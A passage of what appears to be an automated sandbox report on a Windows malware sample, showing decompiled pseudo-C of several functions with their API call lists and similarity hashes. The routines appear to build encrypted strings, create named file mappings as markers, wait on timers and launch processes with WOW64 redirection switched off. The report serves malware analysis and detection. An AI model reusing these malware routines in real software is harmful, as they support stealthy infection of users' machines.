                                				intOrPtr _t33;
                                				intOrPtr _t34;
                                				intOrPtr _t35;
                                				intOrPtr _t39;
                                				void* _t42;
                                				void* _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t48;
                                				intOrPtr _t52;
                                				intOrPtr _t55;
                                				intOrPtr _t56;
                                				intOrPtr _t62;
                                				intOrPtr _t66;
                                				intOrPtr* _t68;
                                				intOrPtr _t78;
                                				intOrPtr _t81;
                                				intOrPtr _t84;
                                				void* _t87;
                                				intOrPtr _t88;
                                				void* _t91;
                                				intOrPtr _t92;
                                				void* _t95;
                                				intOrPtr* _t97;
                                				void* _t98;
                                				void* _t99;
                                				void* _t103;
                                				intOrPtr _t105;
                                				long _t107;
                                				intOrPtr _t108;
                                				intOrPtr* _t109;
                                				long _t110;
                                				void* _t111;
                                				void* _t112;
                                				void* _t113;
                                				void* _t114;
                                				void* _t115;
                                				void* _t117;
                                				void* _t118;
                                				void* _t120;
                                				void* _t121;
                                
                                				_t103 = __edx;
                                				_t110 = __eax;
                                				_v8 = 8;
                                				_t117 = RtlAllocateHeap( *0x419a290, 0, 0x800);
                                				if(_t117 != 0) {
                                					if(_t110 == 0) {
                                						_t110 = GetTickCount();
                                					}
                                					_t31 =  *0x419a018; // 0x0
                                					asm("bswap eax");
                                					_t97 =  *0x419a134; // 0x4197909
                                					_t32 =  *0x419a014; // 0x0
                                					asm("bswap eax");
                                					_t33 =  *0x419a010; // 0x0
                                					asm("bswap eax");
                                					_t34 =  *0x419a00c; // 0x0
                                					asm("bswap eax");
                                					_t35 =  *0x419a2d4; // 0x0
                                					_t2 = _t35 + 0x419b613; // 0x51082418
                                					_t111 =  *_t97(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x419a02c,  *0x419a004, _t110);
                                					_t39 =  *0x419a2d4; // 0x0
                                					_t3 = _t39 + 0x419b653; // 0x98a9fe19
                                					_t42 =  *_t97(_t111 + _t117, _t3, E04196A09());
                                					_t120 = _t118 + 0x38;
                                					_t112 = _t111 + _t42;
                                					if(_v4 != 0) {
                                						_t92 =  *0x419a2d4; // 0x0
                                						_t7 = _t92 + 0x419b65e; // 0x35265981
                                						_t95 =  *_t97(_t112 + _t117, _t7, _v4);
                                						_t120 = _t120 + 0xc;
                                						_t112 = _t112 + _t95;
                                					}
                                					_t43 = E04195040(_t99);
                                					_t44 =  *0x419a2d4; // 0x0
                                					_t9 = _t44 + 0x419b302; // 0x4ad9ece2
                                					_t113 = _t112 +  *_t97(_t112 + _t117, _t9, _t43, _t103);
                                					_t48 =  *0x419a2d4; // 0x0
                                					_t11 = _t48 + 0x419b2d7; // 0xefd2fcd4
                                					_t114 = _t113 +  *_t97(_t113 + _t117, _t11, 0);
                                					_t52 =  *0x419a32c; // 0x0
                                					_t121 = _t120 + 0x1c;
                                					if(_t52 != 0) {
                                						_t88 =  *0x419a2d4; // 0x0
                                						_t13 = _t88 + 0x419b676; // 0x26271f16
                                						_t91 =  *_t97(_t114 + _t117, _t13, _t52);
                                						_t121 = _t121 + 0xc;
                                						_t114 = _t114 + _t91;
                                					}
                                					_t105 =  *0x419a37c; // 0x0
                                					_v4 = E04192885(0x419a00a, _t105 + 4);
                                					_t55 =  *0x419a31c; // 0x0
                                					_t107 = 0;
                                					if(_t55 != 0) {
                                						_t84 =  *0x419a2d4; // 0x0
                                						_t16 = _t84 + 0x419b8da; // 0x82681b86
                                						_t87 =  *_t97(_t114 + _t117, _t16, _t55);
                                						_t121 = _t121 + 0xc;
                                						_t114 = _t114 + _t87;
                                					}
                                					_t56 =  *0x419a318; // 0x0
                                					if(_t56 != _t107) {
                                						_t81 =  *0x419a2d4; // 0x0
                                						_t18 = _t81 + 0x419b8b1; // 0x2aad0059
                                						 *_t97(_t114 + _t117, _t18, _t56);
                                					}
                                					if(_v4 != _t107) {
                                						_t98 = RtlAllocateHeap( *0x419a290, _t107, 0x800);
                                						if(_t98 != _t107) {
                                							E04192DD0(GetTickCount());
                                							_t62 =  *0x419a37c; // 0x0
                                							__imp__(_t62 + 0x40);
                                							asm("lock xadd [eax], ecx");
                                							_t66 =  *0x419a37c; // 0x0
                                							__imp__(_t66 + 0x40);
                                							_t68 =  *0x419a37c; // 0x0
                                							_t115 = E0419624D(1, _t103, _t117,  *_t68);
                                							asm("lock xadd [eax], ecx");
                                							if(_t115 != _t107) {
                                								 *0x419a10c(_t115, 0x41992ac);
                                								_push(_t115);
                                								_t108 = E041921C1();
                                								_v40 = _t108;
                                								if(_t108 != 0) {
                                									 *_t115 = 0;
                                									__imp__(_t98, _v28);
                                									_t109 = __imp__;
                                									 *_t109(_t98, _t108);
                                									 *_t109(_t98, _t115);
                                									_t78 = E04191032(0xffffffffffffffff, _t98, _v48, _v44);
                                									_v76 = _t78;
                                									if(_t78 != 0 && _t78 != 0x10d2) {
                                										E04191492();
                                									}
                                									HeapFree( *0x419a290, 0, _v60);
                                								}
                                								HeapFree( *0x419a290, 0, _t115);
                                								_t107 = 0;
                                							}
                                							HeapFree( *0x419a290, _t107, _t98);
                                						}
                                						HeapFree( *0x419a290, _t107, _v12);
                                					}
                                					HeapFree( *0x419a290, _t107, _t117);
                                				}
                                				return _v16;
                                			}

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 04196F1A
                                • GetTickCount.KERNEL32 ref: 04196F2E
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04197084
                                • GetTickCount.KERNEL32 ref: 04197094
                                • RtlEnterCriticalSection.NTDLL(-00000040), ref: 041970A8
                                • RtlLeaveCriticalSection.NTDLL(-00000040), ref: 041970C6
                                  • Part of subcall function 0419624D: lstrlen.KERNEL32(00000000,00000000,63DCC828,00000000,00000000,?,00000000,041970D9,00000000,00000000), ref: 04196278
                                  • Part of subcall function 0419624D: lstrlen.KERNEL32(00000000,?,00000000,041970D9,00000000,00000000), ref: 04196280
                                  • Part of subcall function 0419624D: strcpy.NTDLL ref: 04196297
                                  • Part of subcall function 0419624D: lstrcat.KERNEL32(00000000,00000000), ref: 041962A2
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000), ref: 04197173
                                  • Part of subcall function 041921C1: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,04197100,00000000), ref: 041921D1
                                  • Part of subcall function 041921C1: lstrlen.KERNEL32(?), ref: 041921D9
                                  • Part of subcall function 041921C1: lstrcpy.KERNEL32(00000000,00000000), ref: 041921ED
                                  • Part of subcall function 041921C1: lstrcat.KERNEL32(00000000,?), ref: 041921F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 04197112
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04197120
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04197124
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04197154
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04197163
                                • HeapFree.KERNEL32(00000000,?), ref: 04197184
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04197192
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTicklstrcpy$EnterLeavestrcpy
                                • String ID:
                                • API String ID: 424325591-0
                                • Opcode ID: dbc0408f0b56f046d518583ed8989d2c2b83282ee2c9420ea99f8e16e3d79d5e
                                • Instruction ID: 42eb39c0cc0c08ccbb9edde26c2e3c47a40ae3f1420307177e8f3472165eb8c7
                                • Opcode Fuzzy Hash: dbc0408f0b56f046d518583ed8989d2c2b83282ee2c9420ea99f8e16e3d79d5e
                                • Instruction Fuzzy Hash: 1B717CB1500245AFD721DB6AED88E567BECFF88780B190515F959C3200EB3ABD899B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 82%
                                			E04192022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                				struct %anon52 _v8;
                                				long _v12;
                                				char _v16;
                                				char _v20;
                                				signed int _v24;
                                				intOrPtr _v32;
                                				union _LARGE_INTEGER _v36;
                                				intOrPtr _v40;
                                				void* _v44;
                                				void _v88;
                                				char _v92;
                                				struct %anon52 _t46;
                                				intOrPtr _t51;
                                				long _t53;
                                				void* _t54;
                                				struct %anon52 _t61;
                                				long _t65;
                                				signed int _t66;
                                				void* _t71;
                                				signed int _t72;
                                				intOrPtr _t74;
                                				intOrPtr _t76;
                                				void** _t78;
                                				void* _t80;
                                
                                				_t74 = __edx;
                                				_v92 = 0;
                                				memset( &_v88, 0, 0x2c);
                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                				_v44 = _t46;
                                				if(_t46 == 0) {
                                					_v8.LowPart = GetLastError();
                                				} else {
                                					_push(0xffffffff);
                                					_push(0xff676980);
                                					_push(0);
                                					_push( *0x419a298);
                                					_v20 = 0;
                                					_v16 = 0;
                                					L04197D8C();
                                					_v36.LowPart = _t46;
                                					_v32 = _t74;
                                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                					_t51 =  *0x419a2c4; // 0x350
                                					_v40 = _t51;
                                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                					_v8.LowPart = _t53;
                                					if(_t53 == 0) {
                                						if(_a8 != 0 || E04191AB8(_t74) != 0) {
                                							 *0x419a2a4 = 5;
                                						}
                                						_v12 = 0;
                                						L6:
                                						L6:
                                						if(_v12 == 1 && ( *0x419a2b8 & 0x00000001) == 0) {
                                							_v12 = 2;
                                						}
                                						_t72 = _v12;
                                						_t58 = _t72 << 4;
                                						_t76 = _t80 + (_t72 << 4) - 0x54;
                                						_t73 = _t72 + 1;
                                						_v24 = _t72 + 1;
                                						_t61 = E04195F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
                                						_v8.LowPart = _t61;
                                						if(_t61 != 0) {
                                							goto L17;
                                						}
                                						_t66 = _v24;
                                						_t90 = _t66 - 3;
                                						_v12 = _t66;
                                						if(_t66 != 3) {
                                							goto L6;
                                						} else {
                                							_v8.LowPart = E04193032(_t73, _t90,  &_v92, _a4, _a8);
                                						}
                                						goto L12;
                                						L17:
                                						__eflags = _t61 - 0x10d2;
                                						if(_t61 != 0x10d2) {
                                							_push(0xffffffff);
                                							_push(0xff676980);
                                							_push(0);
                                							_push( *0x419a29c);
                                							goto L21;
                                						} else {
                                							__eflags =  *0x419a2a0; // 0x0
                                							if(__eflags == 0) {
                                								goto L12;
                                							} else {
                                								_t61 = E04191492();
                                								_push(0xffffffff);
                                								_push(0xdc3cba00);
                                								_push(0);
                                								_push( *0x419a2a0);
                                								L21:
                                								L04197D8C();
                                								_v36.LowPart = _t61;
                                								_v32 = _t76;
                                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                								__eflags = _t65;
                                								_v8.LowPart = _t65;
                                								if(_t65 == 0) {
                                									goto L6;
                                								} else {
                                									goto L12;
                                								}
                                							}
                                						}
                                						L25:
                                					}
                                					L12:
                                					_t78 =  &_v92;
                                					_t71 = 3;
                                					do {
                                						_t54 =  *_t78;
                                						if(_t54 != 0) {
                                							HeapFree( *0x419a290, 0, _t54);
                                						}
                                						_t78 =  &(_t78[4]);
                                						_t71 = _t71 - 1;
                                					} while (_t71 != 0);
                                					CloseHandle(_v44);
                                				}
                                				return _v8;
                                				goto L25;
                                			}

                                APIs
                                • memset.NTDLL ref: 04192037
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04192043
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04192068
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04192084
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0419209D
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04192132
                                • CloseHandle.KERNEL32(?), ref: 04192141
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0419217B
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0419560C), ref: 04192191
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0419219C
                                  • Part of subcall function 04191AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,281EC7EF,0419BD98,?,00000000,F8C925DB,00000014,2738C7B8,0419BD54), ref: 04191BA4
                                  • Part of subcall function 04191AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,041920B0), ref: 04191BB6
                                • GetLastError.KERNEL32 ref: 041921AE
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID:
                                • API String ID: 3521023985-0
                                • Opcode ID: b0a231fc5e8ef44f9b8a903dcc9308a04c28d019e34d4799fb6e7130c1a5cf65
                                • Instruction ID: 9830277ea9640eb11fac899e1b0e4fc050c8d80c40e6935d75a924839cb1978a
                                • Opcode Fuzzy Hash: b0a231fc5e8ef44f9b8a903dcc9308a04c28d019e34d4799fb6e7130c1a5cf65
                                • Instruction Fuzzy Hash: C5516DB1901229BADF109FD5DC849EEBFFCEF09360F244566E514A2280D775AE84CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E04195927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				long _v16;
                                				intOrPtr _v20;
                                				signed int _v24;
                                				void* __esi;
                                				long _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t46;
                                				void* _t48;
                                				void* _t49;
                                				void* _t50;
                                				intOrPtr _t54;
                                				intOrPtr _t57;
                                				void* _t58;
                                				void* _t59;
                                				void* _t60;
                                				intOrPtr _t66;
                                				void* _t71;
                                				void* _t74;
                                				intOrPtr _t75;
                                				void* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t80;
                                				intOrPtr _t91;
                                
                                				_t79 =  *0x419a38c; // 0x0
                                				_v24 = 8;
                                				_t43 = GetTickCount();
                                				_push(5);
                                				_t74 = 0xa;
                                				_v16 = _t43;
                                				_t44 = E04194E1B(_t74,  &_v16);
                                				_v8 = _t44;
                                				if(_t44 == 0) {
                                					_v8 = 0x41991ac;
                                				}
                                				_t46 = E041942F0(_t79);
                                				_v12 = _t46;
                                				if(_t46 != 0) {
                                					_t80 = __imp__;
                                					_t48 =  *_t80(_v8, _t71);
                                					_t49 =  *_t80(_v12);
                                					_t50 =  *_t80(_a4);
                                					_t54 = E04196837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                					_v20 = _t54;
                                					if(_t54 != 0) {
                                						_t75 =  *0x419a2d4; // 0x0
                                						_t16 = _t75 + 0x419baa8; // 0x70318002
                                						 *0x419a138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                						_push(4);
                                						_t77 = 5;
                                						_t57 = E04194E1B(_t77,  &_v16);
                                						_v8 = _t57;
                                						if(_t57 == 0) {
                                							_v8 = 0x41991b0;
                                						}
                                						_t58 =  *_t80(_v8);
                                						_t59 =  *_t80(_v12);
                                						_t60 =  *_t80(_a4);
                                						_t91 = E04196837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                						if(_t91 == 0) {
                                							E041950CA(_v20);
                                						} else {
                                							_t66 =  *0x419a2d4; // 0x0
                                							_t31 = _t66 + 0x419bbc8; // 0xb9d63b8e
                                							 *0x419a138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                							 *_a16 = _v20;
                                							_v24 = _v24 & 0x00000000;
                                							 *_a20 = _t91;
                                						}
                                					}
                                					E041950CA(_v12);
                                				}
                                				return _v24;
                                			}

                                APIs
                                • GetTickCount.KERNEL32 ref: 0419593C
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 0419597C
                                • lstrlen.KERNEL32(00000000), ref: 04195985
                                • lstrlen.KERNEL32(00000000), ref: 0419598C
                                • lstrlenW.KERNEL32(80000002), ref: 04195999
                                • lstrlen.KERNEL32(?,00000004), ref: 041959F9
                                • lstrlen.KERNEL32(?), ref: 04195A02
                                • lstrlen.KERNEL32(?), ref: 04195A09
                                • lstrlenW.KERNEL32(?), ref: 04195A10
                                  • Part of subcall function 041950CA: HeapFree.KERNEL32(00000000,00000000,04194239,00000000,00000001,?,00000000,?,?,?,04196B8D,00000000,?,00000001), ref: 041950D6
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: 297b62fc4be1dfcebd73dadc888e527e95f5d21583e9e3cd1e6718ae623c0ed4
                                • Instruction ID: faa319793125fd46320a373e09045512ec33b41d4b5979e94612836188016cbc
                                • Opcode Fuzzy Hash: 297b62fc4be1dfcebd73dadc888e527e95f5d21583e9e3cd1e6718ae623c0ed4
                                • Instruction Fuzzy Hash: 4B415972900209BFCF12AFA5DD84A9E7BB5FF48318F050094ED04A7221DB35AE55EB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 61%
                                			E041951A8(void* __eax, void* __ecx) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* _v28;
                                				long _v32;
                                				void _v104;
                                				char _v108;
                                				long _t39;
                                				intOrPtr _t43;
                                				intOrPtr _t50;
                                				void* _t52;
                                				intOrPtr _t53;
                                				void* _t61;
                                				intOrPtr* _t66;
                                				intOrPtr* _t73;
                                				intOrPtr* _t76;
                                
                                				_t1 = __eax + 0x14; // 0x74183966
                                				_t71 =  *_t1;
                                				_t39 = E04194F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                				_v8 = _t39;
                                				if(_t39 != 0) {
                                					L12:
                                					return _v8;
                                				}
                                				E041977A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
                                				_t43 = _v12(_v12);
                                				_v8 = _t43;
                                				if(_t43 == 0 && ( *0x419a2b8 & 0x00000001) != 0) {
                                					_v32 = 0;
                                					asm("stosd");
                                					asm("stosd");
                                					asm("stosd");
                                					_v108 = 0;
                                					memset( &_v104, 0, 0x40);
                                					_t50 =  *0x419a2d4; // 0x0
                                					_t18 = _t50 + 0x419b4a3; // 0x229b40a
                                					_t52 = E04196343(_t18);
                                					_v12 = _t52;
                                					if(_t52 == 0) {
                                						_v8 = 8;
                                					} else {
                                						_t53 =  *0x419a2d4; // 0x0
                                						_t20 = _t53 + 0x419b770; // 0x419b770
                                						_t21 = _t53 + 0x419b0af; // 0xee60505d
                                						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                                						if(_t66 == 0) {
                                							_v8 = 0x7f;
                                						} else {
                                							_t73 = __imp__;
                                							_v108 = 0x44;
                                							 *_t73(0);
                                							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
                                							 *_t73(1);
                                							if(_t61 == 0) {
                                								_v8 = GetLastError();
                                							} else {
                                								CloseHandle(_v28);
                                								CloseHandle(_v32);
                                							}
                                						}
                                						HeapFree( *0x419a290, 0, _v12);
                                					}
                                				}
                                				_t76 = _v16;
                                				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
                                				E041950CA(_t76);
                                				goto L12;
                                			}

                                APIs
                                  • Part of subcall function 04194F5A: GetModuleHandleA.KERNEL32(E66068DB,00000020,74183966,00000000,00000000,?,?,?,041951C4,?,?,?,?,00000000,00000000), ref: 04194F7F
                                  • Part of subcall function 04194F5A: GetProcAddress.KERNEL32(00000000,A8E5FD73), ref: 04194FA1
                                  • Part of subcall function 04194F5A: GetProcAddress.KERNEL32(00000000,94BA1371), ref: 04194FB7
                                  • Part of subcall function 04194F5A: GetProcAddress.KERNEL32(00000000,A3348E43), ref: 04194FCD
                                  • Part of subcall function 04194F5A: GetProcAddress.KERNEL32(00000000,45DAC78A), ref: 04194FE3
                                  • Part of subcall function 04194F5A: GetProcAddress.KERNEL32(00000000,23A90951), ref: 04194FF9
                                • memset.NTDLL ref: 04195212
                                  • Part of subcall function 04196343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0419522B,0229B40A), ref: 04196354
                                  • Part of subcall function 04196343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0419636E
                                • GetModuleHandleA.KERNEL32(EE60505D,0419B770,0229B40A), ref: 04195249
                                • GetProcAddress.KERNEL32(00000000), ref: 04195250
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0419526A
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04195288
                                • CloseHandle.KERNEL32(00000000), ref: 04195297
                                • CloseHandle.KERNEL32(?), ref: 0419529C
                                • GetLastError.KERNEL32 ref: 041952A0
                                • HeapFree.KERNEL32(00000000,?), ref: 041952BC
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                • String ID:
                                • API String ID: 91923200-0
                                • Opcode ID: 34b2c470896126d0fdf93c7c4a91588cf1027fad091defbba3b6cfad4ceb39dd
                                • Instruction ID: c0bd4febd7e8cb7aef6afdab0a0517abc404d5aca7076bf42939e43ca9e297a4
                                • Opcode Fuzzy Hash: 34b2c470896126d0fdf93c7c4a91588cf1027fad091defbba3b6cfad4ceb39dd
                                • Instruction Fuzzy Hash: F1314772900219FFDF16AFE5D888A9EBFB9FF08340F144095E509A3210D775AE85DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E04196384(intOrPtr __edx, void** _a4, void** _a8) {
                                				intOrPtr _v8;
                                				struct _FILETIME* _v12;
                                				short _v56;
                                				struct _FILETIME* _t12;
                                				intOrPtr _t13;
                                				void* _t21;
                                				intOrPtr _t27;
                                				long _t28;
                                				void* _t30;
                                
                                				_t27 = __edx;
                                				_t12 =  &_v12;
                                				GetSystemTimeAsFileTime(_t12);
                                				_push(0x192);
                                				_push(0x54d38000);
                                				_push(_v8);
                                				_push(_v12);
                                				L04197D86();
                                				_push(_t12);
                                				_v12 = _t12;
                                				_t13 =  *0x419a2d4; // 0x0
                                				_t5 = _t13 + 0x419b8a2; // 0x419b8a2
                                				_t6 = _t13 + 0x419b57c; // 0x275ca0c8
                                				_push(0x16);
                                				_push( &_v56);
                                				_v8 = _t27;
                                				L04197A6A();
                                				_t30 = CreateFileMappingW(0xffffffff, 0x419a2f8, 4, 0, 0x1000,  &_v56);
                                				if(_t30 == 0) {
                                					_t28 = GetLastError();
                                				} else {
                                					if(GetLastError() == 0xb7) {
                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0);
                                						if(_t21 == 0) {
                                							_t28 = GetLastError();
                                							if(_t28 != 0) {
                                								goto L6;
                                							}
                                						} else {
                                							 *_a4 = _t30;
                                							 *_a8 = _t21;
                                							_t28 = 0;
                                						}
                                					} else {
                                						_t28 = 2;
                                						L6:
                                						CloseHandle(_t30);
                                					}
                                				}
                                				return _t28;
                                			}

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,04195488,?,00000001,8B330082,00000001,0419A2FC,00000000,?), ref: 04196390
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 041963A6
                                • _snwprintf.NTDLL ref: 041963CB
                                • CreateFileMappingW.KERNEL32(000000FF,0419A2F8,00000004,00000000,00001000,?), ref: 041963E7
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04195488,?,00000001,8B330082,00000001,0419A2FC), ref: 041963F9
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,04195488), ref: 04196410
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04195488,?,00000001,8B330082,00000001), ref: 04196431
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04195488,?,00000001,8B330082,00000001,0419A2FC), ref: 04196439
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: 2f23c48b59f3abb47c81cb1fd2ae6ac21d4dc6ea5bba5a0d39229500217e19da
                                • Instruction ID: 2f65a72e1655fee2b046cba33cb586bf64a6cbb6d11f412f33d87c50b909edff
                                • Opcode Fuzzy Hash: 2f23c48b59f3abb47c81cb1fd2ae6ac21d4dc6ea5bba5a0d39229500217e19da
                                • Instruction Fuzzy Hash: 412102B2600214FBDB109BA5DC86F9E77F8EF44B50F244125F915E72C0EB70AD408B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 0419295E
                                • SysAllocString.OLEAUT32(53327E6E), ref: 04192972
                                • SysAllocString.OLEAUT32(00000000), ref: 04192984
                                • SysFreeString.OLEAUT32(00000000), ref: 041929E8
                                • SysFreeString.OLEAUT32(00000000), ref: 041929F7
                                • SysFreeString.OLEAUT32(00000000), ref: 04192A02
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: a79152dfc30d3be2fae64d17aad3522adce9ac177e11b6e80788c2fd33ab0ffb
                                • Instruction ID: 5447e2f1887466fdf626ea7c29813fc7de73adf2f7092b623b1dfcdbc4b33185
                                • Opcode Fuzzy Hash: a79152dfc30d3be2fae64d17aad3522adce9ac177e11b6e80788c2fd33ab0ffb
                                • Instruction Fuzzy Hash: E8315B32D00609AFDF01DFA8D884A9EB7FAAF49310F1444A9ED14EB210DB75AD06CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E04194454(char __eax, signed int* __esi) {
                                				long _v8;
                                				char _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v28;
                                				long _t34;
                                				signed int _t39;
                                				long _t50;
                                				char _t59;
                                				intOrPtr _t61;
                                				void* _t62;
                                				void* _t63;
                                				signed int* _t64;
                                				char _t65;
                                				intOrPtr* _t67;
                                				void* _t68;
                                				signed int* _t69;
                                
                                				_t69 = __esi;
                                				_t65 = __eax;
                                				_v8 = 0;
                                				_v12 = __eax;
                                				if(__eax == 0) {
                                					_t59 =  *0x419a2c8; // 0x0
                                					_v12 = _t59;
                                				}
                                				_t64 = _t69;
                                				E0419143F( &_v12, _t64);
                                				if(_t65 != 0) {
                                					 *_t69 =  *_t69 ^  *0x419a2d0 ^ 0x4c0ca0ae;
                                				} else {
                                					 *0x419a0e4(0,  &_v8);
                                					_t50 = _v8;
                                					if(_t50 != 0) {
                                						_t62 = RtlAllocateHeap( *0x419a290, 0, _t50 + _t50);
                                						if(_t62 != 0) {
                                							_push( &_v8);
                                							_push(_t62);
